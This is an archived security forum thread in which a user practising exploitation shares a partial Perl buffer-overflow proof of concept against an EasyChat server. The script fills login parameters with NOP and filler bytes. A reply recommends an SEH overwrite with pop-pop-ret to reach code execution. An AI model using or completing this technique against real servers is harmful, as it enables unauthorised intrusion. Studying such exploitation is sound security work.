Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
It is currently 19 Jul 2012 16:06

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 2 posts ] 
Author Message
 Post subject: EasyChat server code execution
PostPosted: 10 Sep 2007 22:09 

Joined: 14 Aug 2007 15:47
Posts: 1
Hey, I'm practicing exploitation and I thought I would try this. So far I can overflow the buffer and control EIP. The problem is no registers point to my shellcode, so how can I get code execution to work?

[code]
#!/usr/bin/perl

use IO::Socket;

$expl0it = "\x90" x 220;
$expl0it .= "A" x 4;
$expl0it .= "C" x 12;

$sock = IO::Socket::INET->new( PeerAddr => "localhost",
PeerPort => 80,
Proto => 'tcp' ) || die "Error connecting: $!\n";

print $sock "GET /chat.ghp?username=".$expl0it."&password=".$expl0it."&room=1&sex=2 HTTP/1.1\r\nHost: localhost\r\n\r\n";
[/code]

thanks


Top
 Profile  
 
 
 Post subject:
PostPosted: 12 Sep 2007 13:01 

Joined: 14 Aug 2007 13:32
Posts: 71
Well if no registers hold your shell code or the user supplied data try to over write the seh handlers that is your only option ive saw this loads of times eip get over written and nothing holds our shell code.Add more buffer see if you can control the seh handlers,Then you can just do a pop pop ret into the stack.


Top
 Profile  
 
Display posts from previous:  Sort by  
Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 2 posts ] 

All times are UTC [ DST ]


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for: